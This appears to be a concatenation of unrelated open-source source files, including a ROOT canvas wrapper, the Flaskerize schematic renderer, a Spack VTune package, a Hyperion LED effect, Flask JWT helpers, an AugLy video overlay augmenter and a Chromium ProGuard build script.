ret = super(Pad, self).Draw(*args)
canvas = self.GetCanvas()
keepalive(canvas, self)
return ret
@property
def width(self):
return self.GetWNDC()
@property
def height(self):
return self.GetHNDC()
@property
def width_pixels(self):
mother = self.mother
canvas = self.canvas
w = self.GetWNDC()
while mother is not canvas:
w *= mother.GetWNDC()
mother = mother.mother
return int(w * mother.width)
@property
def height_pixels(self):
mother = self.mother
canvas = self.canvas
h = self.GetHNDC()
while mother is not canvas:
h *= mother.GetHNDC()
mother = mother.mother
return int(h * mother.height)
@snake_case_methods
class Canvas(_PadBase, QROOT.TCanvas):
_ROOT = QROOT.TCanvas
def __init__(self,
width=None, height=None,
x=None, y=None,
name=None, title=None,
size_includes_decorations=False):
# The following line will trigger finalSetup and start the graphics
# thread if not started already
style = ROOT.gStyle
if width is None:
width = style.GetCanvasDefW()
if height is None:
height = style.GetCanvasDefH()
if x is None:
x = style.GetCanvasDefX()
if y is None:
y = style.GetCanvasDefY()
super(Canvas, self).__init__(x, y, width, height,
name=name, title=title)
if not size_includes_decorations:
# Canvas dimensions include the window manager's decorations by
# default in vanilla ROOT. I think this is a bad default.
# Since in the most common case I don't care about the window
# decorations, the default will be to set the dimensions of the
# paintable area of the canvas.
if self.IsBatch():
self.SetCanvasSize(width, height)
else:
self.SetWindowSize(width + (width - self.GetWw()),
height + (height - self.GetWh()))
self.size_includes_decorations = size_includes_decorations
@property
def width(self):
return self.GetWw()
@width.setter
def width(self, value):
value = int(value)
if self.IsBatch():
self.SetCanvasSize(value, self.GetWh())
else:
curr_height = self.GetWh()
self.SetWindowSize(value, curr_height)
if not getattr(self, 'size_includes_decorations', False):
self.SetWindowSize(value + (value - self.GetWw()),
curr_height + (curr_height - self.GetWh()))
@property
def width_pixels(self):
return self.GetWw()
@width_pixels.setter
def width_pixels(self, value):
self.width = value
@property
def height(self):
return self.GetWh()
@height.setter
def height(self, value):
value = int(value)
if self.IsBatch():
self.SetCanvasSize(self.GetWw(), value)
else:
curr_width = self.GetWw()
self.SetWindowSize(curr_width, value)
if not getattr(self, 'size_includes_decorations', False):
self.SetWindowSize(curr_width + (curr_width - self.GetWw()),
value + (value - self.GetWh()))
@property
def height_pixels(self):
return self.GetWh()
@height_pixels.setter
def height_pixels(self, value):
self.height = value
|
flaskerize/render.py | ehoeffner/flaskerize | 119 | 11097038 | <gh_stars>100-1000
import os
import argparse
from typing import Any, Callable, Dict, List, Optional
import fs
from termcolor import colored
from flaskerize.parser import FzArgumentParser
DEFAULT_TEMPLATE_PATTERN = ["**/*.template"]
class SchematicRenderer:
"""Render Flaskerize schematics"""
# Path to schematic files to copy, relative to top-level schematic_path
DEFAULT_FILES_DIRNAME = "files"
def __init__(
self,
schematic_path: str,
src_path: str = ".",
output_prefix: str = "",
dry_run: bool = False,
):
from jinja2 import Environment
from flaskerize.fileio import StagedFileSystem
self.src_path = src_path
self.output_prefix = output_prefix
self.schematic_path = schematic_path
self.schematic_files_path = os.path.join(
self.schematic_path, self.DEFAULT_FILES_DIRNAME
)
self.schema_path = self._get_schema_path()
self._load_schema()
self.arg_parser = self._check_get_arg_parser()
self.env = Environment()
self.fs = StagedFileSystem(
src_path=self.src_path, output_prefix=output_prefix, dry_run=dry_run
)
self.sch_fs = fs.open_fs(f"osfs://{self.schematic_files_path}")
self.dry_run = dry_run
def _load_schema(self) -> None:
if self.schema_path:
import json
with open(self.schema_path, "r") as fid:
self.config = json.load(fid)
else:
self.config = {}
def _get_schema_path(self) -> Optional[str]:
schema_path = os.path.join(self.schematic_path, "schema.json")
if not os.path.isfile(schema_path):
return None
return schema_path
def _check_get_arg_parser(
self, schema_path: Optional[str] = None
) -> FzArgumentParser:
"""Load argument parser from schema.json, if provided"""
return FzArgumentParser(schema=schema_path or self.schema_path)
def copy_from_sch(self, src_path: str, dst_path: str = None) -> None:
"""Copy a file from the schematic root to to the staging file system"""
dst_path = dst_path or src_path
dst_dir = os.path.dirname(dst_path)
if not self.fs.render_fs.exists(dst_dir):
self.fs.render_fs.makedirs(dst_dir)
return fs.copy.copy_file(
self.sch_fs, src_path, self.fs.render_fs, dst_path or src_path
)
def get_static_files(self) -> List[str]:
"""Get list of files to be copied unchanged"""
from pathlib import Path
patterns = self.config.get("templateFilePatterns", DEFAULT_TEMPLATE_PATTERN)
all_files = list(str(p) for p in Path(self.schematic_files_path).glob("**/*"))
filenames = [os.path.relpath(s, self.schematic_files_path) for s in all_files]
filenames = list(set(filenames) - set(self.get_template_files()))
return filenames
def get_template_files(self) -> List[str]:
"""Get list of templated files to be rendered via Jinja"""
from pathlib import Path
filenames = []
patterns = self.config.get("templateFilePatterns", DEFAULT_TEMPLATE_PATTERN)
for pattern in patterns:
filenames.extend(
[str(p) for p in Path(self.schematic_files_path).glob(pattern)]
)
ignore_filenames = self._get_ignore_files()
filenames = list(set(filenames) - set(ignore_filenames))
filenames = [os.path.relpath(s, self.schematic_files_path) for s in filenames]
return filenames
def _get_ignore_files(self) -> List[str]:
from pathlib import Path
ignore_filenames = []
ignore_patterns = self.config.get("ignoreFilePatterns", [])
for pattern in ignore_patterns:
ignore_filenames.extend(
[str(p) for p in Path(self.schematic_path).glob(pattern)]
)
return ignore_filenames
def _generate_outfile(
self, template_file: str, root: str, context: Optional[Dict] = None
) -> str:
# TODO: remove the redundant parameter template file that is copied
# outfile_name = self._get_rel_path(full_path=template_file, rel_to=root)
outfile_name = "".join(template_file.rsplit(".template"))
tpl = self.env.from_string(outfile_name)
if context is None:
context = {}
return tpl.render(**context)
def render_from_file(self, template_path: str, context: Dict) -> None:
outpath = self._generate_outfile(template_path, self.src_path, context=context)
outdir, outfile = os.path.split(outpath)
rendered_outpath = os.path.join(self.src_path, outpath)
rendered_outdir = os.path.join(rendered_outpath, outdir)
if self.sch_fs.isfile(template_path):
# TODO: Refactor dry-run and file system interactions to a composable object
# passed into this class rather than it containing the write logic
# with open(template_path, "r") as fid:
with self.sch_fs.open(template_path, "r") as fid:
tpl = self.env.from_string(fid.read())
with self.fs.open(outpath, "w") as fout:
fout.write(tpl.render(**context))
def copy_static_file(self, filename: str, context: Dict[str, Any]):
from shutil import copy
# If the path is a directory, need to ensure trailing slash so it does not get
# split incorrectly
if self.sch_fs.isdir(filename):
filename = os.path.join(filename, "")
outpath = self._generate_outfile(filename, self.src_path, context=context)
outdir, outfile = os.path.split(outpath)
rendered_outpath = os.path.join(self.src_path, outpath)
rendered_outdir = os.path.join(rendered_outpath, outdir)
if self.sch_fs.isfile(filename):
self.copy_from_sch(filename, outpath)
def print_summary(self):
"""Print summary of operations performed"""
print(
f"""
Flaskerize job summary:
{colored("Schematic generation successful!", "green")}
Full schematic path: {colored(self.schematic_path, "yellow")}
"""
)
self.fs.print_fs_diff()
def _load_run_function(self, path: str) -> Callable:
from importlib.util import spec_from_file_location, module_from_spec
spec = spec_from_file_location("run", path)
module = module_from_spec(spec)
spec.loader.exec_module(module)
if not hasattr(module, "run"):
raise ValueError(f"No method 'run' function found in {path}")
return getattr(module, "run")
def _load_custom_functions(self, path: str) -> None:
import os
from flaskerize import registered_funcs
from importlib.util import spec_from_file_location, module_from_spec
if not os.path.exists(path):
return
spec = spec_from_file_location("custom_functions", path)
module = module_from_spec(spec)
spec.loader.exec_module(module)
for f in registered_funcs:
self.env.globals[f.__name__] = f
def render(self, name: str, args: List[Any]) -> None:
"""Renders the schematic"""
context = vars(self.arg_parser.parse_args(args))
if "name" in context:
raise ValueError(
"Collision between Flaskerize-reserved parameter "
"'name' and parameter found in schema.json corresponding "
f"to {self.schematic_path}"
)
context = {**context, "name": name}
self._load_custom_functions(
path=os.path.join(self.schematic_path, "custom_functions.py")
)
try:
run = self._load_run_function(
path=os.path.join(self.schematic_path, "run.py")
)
except (ImportError, ValueError, FileNotFoundError) as e:
run = default_run
run(renderer=self, context=context)
self.fs.commit()
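# Illustrative flow (sketch; the schematic path and CLI options are placeholders):
#   renderer = SchematicRenderer("path/to/schematic", src_path=".", dry_run=True)
#   renderer.render(name="my_feature", args=["--some-option", "value"])
# The staged file system is only written out by the commit() call at the end of render().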
def default_run(renderer: SchematicRenderer, context: Dict[str, Any]) -> None:
"""Default run method"""
template_files = renderer.get_template_files()
static_files = renderer.get_static_files()
# TODO: add test that static files are correctly removed from template_files, etc
for filename in template_files:
renderer.render_from_file(filename, context=context)
for filename in static_files:
renderer.copy_static_file(filename, context=context)
renderer.print_summary()
|
var/spack/repos/builtin/packages/intel-oneapi-vtune/package.py | BenWibking/spack | 2,360 | 11097046 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import platform
from spack import *
class IntelOneapiVtune(IntelOneApiPackage):
"""Intel oneAPI VTune Profiler.
Installed in Perf driverless mode, detailed here: https://software.intel.com/content/www/us/en/develop/documentation/vtune-cookbook/top/configuration-recipes/profiling-hardware-without-sampling-drivers.html
Users can manually install drivers, please read the instructions here: https://software.intel.com/content/www/us/en/develop/documentation/vtune-help/top/set-up-analysis-target/linux-targets/building-and-installing-the-sampling-drivers-for-linux-targets.html
"""
maintainers = ['rscohn2']
homepage = 'https://software.intel.com/content/www/us/en/develop/tools/oneapi/components/vtune-profiler.html'
if platform.system() == 'Linux':
version('2022.0.0',
url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18406/l_oneapi_vtune_p_2022.0.0.94_offline.sh',
sha256='aa4d575c22e7be0c950b87d67d9e371f470f682906864c4f9b68e530ecd22bd7',
expand=False)
version('2021.7.1',
url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18086/l_oneapi_vtune_p_2021.7.1.492_offline.sh',
sha256='4cf17078ae6e09f26f70bd9d0b726af234cc30c342ae4a8fda69941b40139b26',
expand=False)
version('2021.6.0',
url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18012/l_oneapi_vtune_p_2021.6.0.411_offline.sh',
sha256='6b1df7da713337aa665bcc6ff23e4a006695b5bfaf71dffd305cbadca2e5560c',
expand=False)
@property
def component_dir(self):
return 'vtune'
|
examples/python-base64.py | alexmv/go-camo | 161 | 11097063 | # Copyright (c) 2012-2019 <NAME>
# Use of this source code is governed by an MIT-style
# license that can be found in the LICENSE file.
import hashlib
import hmac
import base64
CAMO_HOST = 'https://img.example.com'
def camo_url(hmac_key, image_url):
if image_url.startswith("https:"):
return image_url
b64digest = base64.urlsafe_b64encode(
hmac.new(hmac_key, image_url, hashlib.sha1).digest()).strip('=')
b64url = base64.urlsafe_b64encode(image_url).strip('=')
requrl = '%s/%s/%s' % (CAMO_HOST, b64digest, b64url)
return requrl
print camo_url("test", "http://golang.org/doc/gopher/frontpage.png")
# 'https://img.example.org/D23vHLFHsOhPOcvdxeoQyAJTpvM/aHR0cDovL2dvbGFuZy5vcmcvZG9jL2dvcGhlci9mcm9udHBhZ2UucG5n'
|
effects/pacman.py | Bosken85/hyperion.ng | 1,808 | 11097070 | import hyperion, time
from random import randint
#get args
rotationTime = float(hyperion.args.get('rotationTime', 4))
marginPos = float(hyperion.args.get('margin-pos', 2))
# define pacman
pacman = bytearray((255, 255, 0))
# define ghosts
redGuy = bytearray((255, 0, 0))
pinkGuy = bytearray((255, 184, 255))
blueGuy = bytearray((0, 255, 255))
slowGuy = bytearray((255, 184, 81))
light = bytearray((255, 184, 174))
background = bytearray((0, 0, 0))
#helper
posPac = 1
diffPac = 6*marginPos
diffGuys = 3*marginPos
sleepTime = max(0.02,rotationTime/hyperion.ledCount)
posPinkGuy = posPac + diffPac
posBlueGuy = posPinkGuy + diffGuys
posSlowGuy = posBlueGuy + diffGuys
posRedGuy = posSlowGuy + diffGuys
# initialize the led data
ledDataEscape = bytearray()
for i in range(hyperion.ledCount):
if i == 1:
ledDataEscape += pacman
elif i == posPinkGuy:
ledDataEscape += pinkGuy
elif i == posBlueGuy:
ledDataEscape += blueGuy
elif i == posSlowGuy:
ledDataEscape += slowGuy
elif i == posRedGuy:
ledDataEscape += redGuy
else:
ledDataEscape += background
ledDataChase = bytearray()
for i in range(hyperion.ledCount):
if i == 1:
ledDataChase += pacman
elif i in [posPinkGuy, posBlueGuy, posSlowGuy, posRedGuy]:
ledDataChase += bytearray((33, 33, 255))
else:
ledDataChase += background
# increment = 3, because LED-Color is defined by 3 Bytes
increment = 3
def shiftLED(ledData, increment, limit, lightPos=None):
state = 0
while state < limit and not hyperion.abort():
ledData = ledData[increment:] + ledData[:increment]
if (lightPos):
tmp = ledData[lightPos]
ledData[lightPos] = light
hyperion.setColor(ledData)
if (lightPos):
ledData[lightPos] = tmp
time.sleep(sleepTime)
state += 1
# start the write data loop
while not hyperion.abort():
# escape mode
ledData = ledDataEscape
shiftLED(ledData, increment, hyperion.ledCount)
random = randint(10,hyperion.ledCount)
# escape mode + power pellet
s = slice(3*random, 3*random+3)
shiftLED(ledData, increment, hyperion.ledCount - random, s)
# chase mode
shift = 3*(hyperion.ledCount - random)
ledData = ledDataChase[shift:]+ledDataChase[:shift]
shiftLED(ledData, -increment, 2*hyperion.ledCount-random)
time.sleep(sleepTime)
|
app/jwt_utils.py | ristekoss/susunjadwal-backend | 155 | 11097103 | <filename>app/jwt_utils.py
import jwt
from flask import current_app as app
def encode_token(data):
return jwt.encode(data, app.config["SECRET_KEY"], algorithm='HS256').decode()
def decode_token(token):
    try:
        # PyJWT's decode() takes the plural ``algorithms`` list.
        data = jwt.decode(token, app.config["SECRET_KEY"], algorithms=['HS256'])
    except Exception:
        return None
    return data
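
# Round-trip sketch (illustrative only; assumes an active Flask application
# context whose config defines SECRET_KEY):
#
#     with app.app_context():
#         token = encode_token({"user_id": 42})
#         assert decode_token(token) == {"user_id": 42}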
|
examples/python/main.py | timfjord/sublime_debugger | 225 | 11097104 |
import time
from threading import Thread
import sys
import os
print(sys.version)
# print(os.environ)
def some_random_variables():
string = "abc"
integer = 1
floating = 2.345
array = [string, integer, floating]
table = {
'string': string,
'intger': integer,
'float': floating,
'array': array,
}
print(string)
print(integer)
print(floating)
print(array)
print(table)
def test():
some_random_variables()
def sleep(duration):
print("Sleeping thread for {}".format(duration))
time.sleep(duration)
threads = []
for i in range(1, 5):
thread = Thread(name='Thread #{}'.format(i), target=sleep, args=(i/2.0,))
thread.start()
threads.append(thread)
some_lambda = lambda: test()
some_lambda()
for thread in threads:
thread.join()
print('Done')
|
api/integrations/slack/permissions.py | mevinbabuc/flagsmith | 1,259 | 11097112 | <filename>api/integrations/slack/permissions.py
from rest_framework.permissions import BasePermission
from environments.models import Environment
class OauthInitPermission(BasePermission):
def has_permission(self, request, view):
environment = Environment.objects.get(
api_key=view.kwargs.get("environment_api_key")
)
return request.user.is_environment_admin(environment)
|
scvi/_utils.py | njbernstein/scvi-tools | 398 | 11097130 | from textwrap import dedent
def _doc_params(**kwds):
"""\
Docstrings should start with "\" in the first line for proper formatting.
"""
def dec(obj):
obj.__orig_doc__ = obj.__doc__
obj.__doc__ = dedent(obj.__doc__).format_map(kwds)
return obj
return dec
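

if __name__ == "__main__":
    # Minimal usage sketch (illustrative text, not taken from scvi-tools).
    summary = "n_hidden\n    Number of hidden units."

    @_doc_params(param_summary=summary)
    def my_fn(n_hidden):
        """\
        Example function.

        {param_summary}
        """

    print(my_fn.__doc__)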
|
tests/utils/test_dbus.py | pnjongang/supervisor | 597 | 11097142 | """Check dbus-next implementation."""
from dbus_next.signature import Variant
from supervisor.coresys import CoreSys
from supervisor.utils.dbus import DBus, _remove_dbus_signature
def test_remove_dbus_signature():
"""Check D-Bus signature clean-up."""
test = _remove_dbus_signature(Variant("s", "Value"))
assert isinstance(test, str)
assert test == "Value"
test_dict = _remove_dbus_signature({"Key": Variant("s", "Value")})
assert isinstance(test_dict["Key"], str)
assert test_dict["Key"] == "Value"
test_dict = _remove_dbus_signature([Variant("s", "Value")])
assert isinstance(test_dict[0], str)
assert test_dict[0] == "Value"
async def test_dbus_prepare_args(coresys: CoreSys):
"""Check D-Bus dynamic argument builder."""
dbus = DBus("org.freedesktop.systemd1", "/org/freedesktop/systemd1")
signature, args = dbus._prepare_args(
True, 1, 1.0, "Value", ("a{sv}", {"Key": "Value"})
)
assert signature == "bidsa{sv}"
|
python_modules/dagster-graphql/dagster_graphql/schema/pipelines/pipeline_run_stats.py | dbatten5/dagster | 4,606 | 11097149 | import graphene
from dagster import check
from dagster.core.storage.pipeline_run import PipelineRunStatsSnapshot
from ..errors import GraphenePythonError
class GraphenePipelineRunStatsSnapshot(graphene.ObjectType):
id = graphene.NonNull(graphene.String)
runId = graphene.NonNull(graphene.String)
stepsSucceeded = graphene.NonNull(graphene.Int)
stepsFailed = graphene.NonNull(graphene.Int)
materializations = graphene.NonNull(graphene.Int)
expectations = graphene.NonNull(graphene.Int)
enqueuedTime = graphene.Field(graphene.Float)
launchTime = graphene.Field(graphene.Float)
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
class Meta:
name = "PipelineRunStatsSnapshot"
def __init__(self, stats):
self._stats = check.inst_param(stats, "stats", PipelineRunStatsSnapshot)
super().__init__(
id="stats-" + self._stats.run_id,
runId=self._stats.run_id,
stepsSucceeded=self._stats.steps_succeeded,
stepsFailed=self._stats.steps_failed,
materializations=self._stats.materializations,
expectations=self._stats.expectations,
enqueuedTime=stats.enqueued_time,
launchTime=stats.launch_time,
startTime=self._stats.start_time,
endTime=self._stats.end_time,
)
class GraphenePipelineRunStatsOrError(graphene.Union):
class Meta:
types = (GraphenePipelineRunStatsSnapshot, GraphenePythonError)
name = "PipelineRunStatsOrError"
|
tomviz/python/ReinterpretSignedToUnsigned.py | sankhesh/tomviz | 284 | 11097168 | <reponame>sankhesh/tomviz
def transform(dataset):
"""Reinterpret a signed integral array type as its unsigned counterpart.
This can be used when the bytes of a data array have been interpreted as a
signed array when it should have been interpreted as an unsigned array."""
import numpy as np
scalars = dataset.active_scalars
if scalars is None:
raise RuntimeError("No scalars found!")
dtype = scalars.dtype
dtype = dtype.type
typeMap = {
np.int8: np.uint8,
np.int16: np.uint16,
np.int32: np.uint32
}
typeAddend = {
np.int8: 128,
np.int16: 32768,
np.int32: 2147483648
}
if dtype not in typeMap:
raise RuntimeError("Scalars are not int8, int16, or int32")
newType = typeMap[dtype]
addend = typeAddend[dtype]
newScalars = scalars.astype(dtype=newType) + addend
dataset.active_scalars = newScalars
|
tg/models.py | horacexd/clist | 166 | 11097172 | <reponame>horacexd/clist
from django.db import models
from pyclist.models import BaseModel
from true_coders.models import Coder
class Chat(BaseModel):
chat_id = models.CharField(max_length=100, blank=True, null=True, unique=True)
coder = models.ForeignKey(Coder, on_delete=models.CASCADE)
title = models.CharField(max_length=100, blank=True, null=True)
name = models.TextField(blank=True, null=True)
secret_key = models.CharField(max_length=20, blank=True, null=True)
last_command = models.JSONField(default=dict, blank=True)
is_group = models.BooleanField(default=False)
coders = models.ManyToManyField(Coder, blank=True, related_name='chats')
settings = models.JSONField(default=dict, blank=True)
def __str__(self):
return "%s#%s" % (self.coder_id, self.chat_id)
def get_group_name(self):
return "%s@%s" % (self.chat_id, self.title)
class History(BaseModel):
LIMIT_BY_CHAT = 7
chat = models.ForeignKey(Chat, on_delete=models.CASCADE)
message = models.JSONField()
def __str__(self):
        return "History %s" % (self.chat)
def save(self, *args, **kwargs):
q = History.objects.filter(chat=self.chat).order_by('created')
count = q.count()
if count > self.LIMIT_BY_CHAT:
for o in q[0:count - self.LIMIT_BY_CHAT]:
o.delete()
super(History, self).save(*args, **kwargs)
class Meta:
verbose_name_plural = 'History'
ordering = ['-created']
|
Silver_Badges/Ayuba_hub_silver_badge/form.py | adeagaoluwaseun/Voting | 764 | 11097177 | from flask_wtf import FlaskForm
from wtforms.validators import DataRequired,Length
class VoterForm(FlaskForm):
username = StringField('Username',validators=[DataRequired(),Length(min=2,max=20)])
nin = IntegerField('Country Code', [validators.required()])
submit = SubmitField('Add Voter') |
desktop/core/src/desktop/lib/paginator.py | kokosing/hue | 5,079 | 11097179 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Very similar to the Django Paginator class, but easier to work with
when you don't have the full object list.
"""
from django.db.models import query
import django.core.paginator
class Paginator(django.core.paginator.Paginator):
"""
Override certain methods of the Django Paginator to allow a partial object list.
Does not support orphans.
"""
def __init__(self, object_list, per_page, total=None, allow_empty_first_page=True):
"""
Accepts a partial ``object_list``, for the purpose of offset and count calculation.
The ``object_list`` is partial if and only if ``total`` is given. In that case,
the list is the data for the *next* call to ``page()``.
If the ``object_list`` is the full list, ``total`` must be None.
"""
super(Paginator, self).__init__(object_list, per_page, 0, allow_empty_first_page)
if total is None:
self.object_list = object_list
else:
self.object_list = None
self._partial_list = object_list
# We compute the list length again because it could have changed,
# which is solved by evaluating the QuerySet with len().
if isinstance(object_list, query.QuerySet):
total = max(total, len(object_list))
# Override parent's private member _count
self._count = total
def validate_number(self, number):
if self.object_list is None:
return number
return super(Paginator, self).validate_number(number)
def page(self, number):
if self.object_list is None:
# Use a partial list if there is one.
# Make sure the length of the list agrees with the Page range.
if self._partial_list is not None:
res = Page(None, number, self) # Set the object_list later; None for now
n_objs = res.end_index() - res.start_index() + 1
res.object_list = self._partial_list[:n_objs]
self._partial_list = None # The _partial_list is single-use
return res
# No data. Just a list of None's
return Page((None,) * self.per_page, number, self)
# Wrap that parent page in our Page class
pg = super(Paginator, self).page(number) # This is a Django Page
return Page(pg.object_list, pg.number, pg.paginator)
class Page(django.core.paginator.Page):
"""
Similar to the Django Page, with extra convenient methods.
"""
def __init__(self, object_list, number, paginator):
super(Page, self).__init__(object_list, number, paginator)
def num_pages(self):
return self.paginator.num_pages
def total_count(self):
return self.paginator.count
def next_page_number(self):
if self.has_next():
return self.number + 1
return self.number
def previous_page_number(self):
if self.has_previous():
return self.number - 1
return self.number
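
# Usage sketch (illustrative only; assumes the Django release this module
# targets, where ``Paginator.count`` is backed by ``self._count``):
#
#     # Full list: behaves like the stock Django paginator.
#     pages = Paginator(range(25), per_page=10)
#
#     # Partial list: pass only the slice for the *next* page() call plus the
#     # known total, e.g. rows 10-19 when page 2 of 25 rows will be requested.
#     pages = Paginator(rows_for_page_2, per_page=10, total=25)
#     page = pages.page(2)   # wraps rows_for_page_2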
|
qt__pyqt__pyside__pyqode/pyqt5__QTreeView_QFileSystemModel.py | DazEB2/SimplePyScripts | 117 | 11097205 | <reponame>DazEB2/SimplePyScripts<gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from PyQt5.QtWidgets import QTreeView, QFileSystemModel, QApplication
from PyQt5.QtCore import QDir
if __name__ == '__main__':
app = QApplication([])
model = QFileSystemModel()
model.setRootPath(QDir.currentPath())
model.setReadOnly(False)
mw = QTreeView()
mw.setModel(model)
mw.setRootIndex(model.index(QDir.currentPath()))
mw.show()
app.exec()
|
augly/video/augmenters/ffmpeg/overlay.py | iAdityaEmpire/AugLy | 4,610 | 11097229 | <reponame>iAdityaEmpire/AugLy
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from typing import List
from augly.utils import is_image_file, is_video_file, pathmgr
from augly.video.augmenters.ffmpeg.base_augmenter import BaseVidgearFFMPEGAugmenter
from augly.video.helpers import get_video_info
class VideoAugmenterByOverlay(BaseVidgearFFMPEGAugmenter):
def __init__(
self,
overlay_path: str,
x_factor: float,
y_factor: float,
use_overlay_audio: bool,
):
assert is_image_file(overlay_path) or is_video_file(
overlay_path
), "Overlaid media type not supported: please overlay either an image or video"
assert 0 <= x_factor <= 1, "x_factor must be a value in the range [0, 1]"
assert 0 <= y_factor <= 1, "y_factor must be a value in the range [0, 1]"
assert (
type(use_overlay_audio) == bool
), "Expected a boolean value for use_overlay_audio"
self.overlay_path = pathmgr.get_local_path(overlay_path)
self.x_factor = x_factor
self.y_factor = y_factor
self.use_overlay_audio = use_overlay_audio and is_video_file(overlay_path)
def get_command(self, video_path: str, output_path: str) -> List[str]:
"""
Overlays media onto the video
@param video_path: the path to the video to be augmented
@param output_path: the path in which the resulting video will be stored.
@returns: a list of strings containing the CLI FFMPEG command for
the augmentation
"""
video_info = get_video_info(video_path)
new_width = video_info["width"] * self.x_factor
new_height = video_info["height"] * self.y_factor
return [
*self.input_fmt(video_path),
"-i",
self.overlay_path,
"-filter_complex",
f"[0:v][1:v] overlay={new_width}:{new_height}",
"-map",
f"{int(self.use_overlay_audio)}:a:0",
*self.output_fmt(output_path),
]
|
ros/create_dockerfiles.py | christophebedard/docker_images-1 | 328 | 11097232 | <filename>ros/create_dockerfiles.py<gh_stars>100-1000
#!/usr/bin/env python3
import os
import sys
import yaml
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from em import Interpreter
from docker_templates.argparse import DockerfileArgParser
from docker_templates.create import create_files
from docker_templates.collections import OrderedLoad
from docker_templates.packages import expandPackages
def main(argv=sys.argv[1:]):
"""Create Dockerfiles for images from platform and image yaml data"""
# Create the top-level parser
parser = DockerfileArgParser(
description="Generate the 'Dockerfile's for the base docker images")
parser.set()
args = parser.parse(argv)
# Read platform params
with open(args.platform, 'r') as f:
        # use safe_load instead of load
platform = yaml.safe_load(f)['platform']
# Read image params using platform params
images_yaml = StringIO()
try:
interpreter = Interpreter(output=images_yaml)
interpreter.file(open(args.images, 'r'), locals=platform)
images_yaml = images_yaml.getvalue()
except Exception as e:
print("Error processing %s" % args.images)
raise
finally:
interpreter.shutdown()
interpreter = None
# Use ordered dict
images = OrderedLoad(images_yaml, yaml.SafeLoader)['images']
# For each image tag
for image in images:
# Get data for image
data = dict(images[image])
data['tag_name'] = image
# Add platform params
data.update(platform)
# Apply package distro/version formatting
expandPackages(data)
# Get path to save Docker file
dockerfile_dir = os.path.join(args.output, image)
if not os.path.exists(dockerfile_dir):
os.makedirs(dockerfile_dir)
data['dockerfile_dir'] = dockerfile_dir
# generate Dockerfile
create_files(data)
if __name__ == '__main__':
main()
|
build/android/gyp/proguard.py | zipated/src | 2,151 | 11097266 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import os
import sys
from util import build_utils
from util import proguard_util
_DANGEROUS_OPTIMIZATIONS = [
# See crbug.com/825995 (can cause VerifyErrors)
"class/merging/vertical",
"class/unboxing/enum",
# See crbug.com/625992
"code/allocation/variable",
# See crbug.com/625994
"field/propagation/value",
"method/propagation/parameter",
"method/propagation/returnvalue",
]
def _ParseOptions(args):
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--proguard-path',
help='Path to the proguard executable.')
parser.add_option('--input-paths',
help='Paths to the .jar files proguard should run on.')
parser.add_option('--output-path', help='Path to the generated .jar file.')
parser.add_option('--proguard-configs', action='append',
help='Paths to proguard configuration files.')
parser.add_option('--proguard-config-exclusions',
default='',
help='GN list of paths to proguard configuration files '
'included by --proguard-configs, but that should '
'not actually be included.')
parser.add_option('--mapping', help='Path to proguard mapping to apply.')
parser.add_option('--is-test', action='store_true',
help='If true, extra proguard options for instrumentation tests will be '
'added.')
parser.add_option('--classpath', action='append',
help='Classpath for proguard.')
parser.add_option('--stamp', help='Path to touch on success.')
parser.add_option('--enable-dangerous-optimizations', action='store_true',
help='Enable optimizations which are known to have issues.')
parser.add_option('--verbose', '-v', action='store_true',
help='Print all proguard output')
options, _ = parser.parse_args(args)
classpath = []
for arg in options.classpath:
classpath += build_utils.ParseGnList(arg)
options.classpath = classpath
configs = []
for arg in options.proguard_configs:
configs += build_utils.ParseGnList(arg)
options.proguard_configs = configs
options.proguard_config_exclusions = (
build_utils.ParseGnList(options.proguard_config_exclusions))
options.input_paths = build_utils.ParseGnList(options.input_paths)
return options
def main(args):
args = build_utils.ExpandFileArgs(args)
options = _ParseOptions(args)
proguard = proguard_util.ProguardCmdBuilder(options.proguard_path)
proguard.injars(options.input_paths)
proguard.configs(options.proguard_configs)
proguard.config_exclusions(options.proguard_config_exclusions)
proguard.outjar(options.output_path)
if options.mapping:
proguard.mapping(options.mapping)
classpath = list(set(options.classpath))
proguard.libraryjars(classpath)
proguard.verbose(options.verbose)
if not options.enable_dangerous_optimizations:
proguard.disable_optimizations(_DANGEROUS_OPTIMIZATIONS)
build_utils.CallAndWriteDepfileIfStale(
proguard.CheckOutput,
options,
input_paths=proguard.GetInputs(),
input_strings=proguard.build(),
output_paths=proguard.GetOutputs(),
depfile_deps=proguard.GetDepfileDeps())
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
rnn_translator/pytorch/seq2seq/inference/inference.py | omshri22121999/training | 567 | 11097270 | import contextlib
import logging
import os
import subprocess
import time
import torch
import torch.distributed as dist
import seq2seq.data.config as config
from seq2seq.inference.beam_search import SequenceGenerator
from seq2seq.utils import AverageMeter
from seq2seq.utils import barrier
from seq2seq.utils import get_rank
from seq2seq.utils import get_world_size
def gather_predictions(preds):
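    """
    Gathers generated predictions from all distributed workers and
    concatenates them; returns the input unchanged for single-worker runs.
    """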
world_size = get_world_size()
if world_size > 1:
all_preds = [preds.new(preds.size(0), preds.size(1)) for i in range(world_size)]
dist.all_gather(all_preds, preds)
preds = torch.cat(all_preds)
return preds
class Translator:
"""
